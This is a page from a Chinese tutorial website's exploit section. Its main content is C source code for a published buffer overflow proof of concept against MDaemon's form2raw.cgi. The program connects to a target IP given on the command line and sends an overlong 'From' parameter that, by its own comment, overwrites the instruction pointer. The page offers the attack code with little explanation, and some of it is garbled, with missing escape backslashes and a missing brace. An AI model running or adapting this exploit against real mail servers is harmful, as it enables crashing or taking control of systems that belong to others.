| | 网站首页 | 新闻快报 | 软件教程 | 硬件教程 | 设计学院 | Q Q 专区 | 编程开发 | 网络安全 | | ||
|
|
|
|
|
|
|
|
|||||
| 您现在的位置: 浩扬网络 >> 编程开发 >> Exploite >> 教程正文 |
| #include <windows.h> #include <stdio.h> #include <winsock.h> #pragma comment (lib,"ws2_32") #define RET 0x1dff160 #define PORT 3000 void main(int argc, char **argv) SOCKET s = 0; WSADATA wsaData; if(argc < 2) { fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " "nUsage: %s <target ip> n", argv[0]); printf("%d",argc); exit(0); } WSAStartup(MAKEWORD(2,0), &wsaData); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(INVALID_SOCKET != s) { SOCKADDR_IN anAddr; anAddr.sin_family = AF_INET; anAddr.sin_port = htons(PORT); anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]); if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr))) { static char buffer[500]; int i; memset(buffer,0,sizeof(buffer)); strcpy(buffer,"get /form2raw.cgi?From="); for(i=0;i<244;i++) { strcat(buffer,"a"); } strcat(buffer,"bbbb"); //Overwrites EIP strcat(buffer,"c");//One byte left after ESP :-( strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0rnrn"); send(s, buffer, strlen(buffer), 0); printf("Exploit Sent."); } else printf("Error Connecting to The Target.n"); closesocket(s); } WSACleanup(); |
|
|
|
|
| | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 网站公告 | |